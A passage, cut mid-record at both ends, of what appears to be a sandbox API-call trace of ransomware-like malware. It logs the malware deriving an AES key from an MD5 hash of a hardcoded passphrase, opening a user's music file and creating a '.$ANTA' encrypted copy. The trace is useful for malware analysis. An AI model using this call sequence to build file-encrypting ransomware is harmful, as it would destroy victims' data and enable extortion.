hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0116.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0116.593] CloseHandle (hObject=0x258) returned 1 [0116.593] FreeLibrary (hLibModule=0x772d0000) returned 1 [0116.593] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0116.593] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\kEfh1XIhHEyxIZI.m4a", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb787e6b0, ftCreationTime.dwHighDateTime=0x1d5e99a, ftLastAccessTime.dwLowDateTime=0x9ec83740, ftLastAccessTime.dwHighDateTime=0x1d5ea37, ftLastWriteTime.dwLowDateTime=0x9ec83740, ftLastWriteTime.dwHighDateTime=0x1d5ea37, nFileSizeHigh=0x0, nFileSizeLow=0xbb73, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="kEfh1XIhHEyxIZI.m4a", cAlternateFileName="KEFH1X~1.M4A")) returned 0x41ac600 [0116.593] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0116.593] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0116.593] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0116.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0116.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0116.594] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a50b8) returned 1 [0116.594] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0116.594] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0116.644] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0116.644] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0116.644] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.644] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0116.644] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.644] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0116.644] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caf70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0116.645] CryptCreateHash (in: hProv=0x41a50b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0116.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0116.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0116.645] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0116.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0116.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0116.645] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0116.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caee0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0116.645] CryptHashData (hHash=0x41ac740, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0116.645] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.645] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0116.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0116.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cae20, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0116.646] CryptDeriveKey (in: hProv=0x41a50b8, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac780) returned 1 [0116.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0116.646] CryptDestroyHash (hHash=0x41ac740) returned 1 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0116.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d04b8 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0116.647] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0116.647] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0116.647] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0116.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0116.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0116.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0116.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0116.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0116.648] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\kEfh1XIhHEyxIZI.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\kefh1xihheyxizi.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0116.648] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.648] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0116.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0116.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0116.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0116.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0116.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0116.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0116.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.648] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0116.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0116.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0116.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0116.649] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0116.649] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0116.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0116.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0116.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0116.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0116.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da070 [0116.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a40c8 [0116.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0116.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4d88 [0116.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da070 | out: hHeap=0x1780000) returned 1 [0116.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0116.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0116.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0116.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a40c8 | out: hHeap=0x1780000) returned 1 [0116.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0116.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0116.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4040 [0116.651] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t")) returned 0x10 [0116.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4040 | out: hHeap=0x1780000) returned 1 [0116.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4d88 | out: hHeap=0x1780000) returned 1 [0116.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0116.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0116.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0116.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0116.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0116.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0116.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0116.651] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\kEfh1XIhHEyxIZI.m4a.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\kefh1xihheyxizi.m4a.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0116.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0116.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0116.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0116.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0116.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0116.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.652] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0116.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 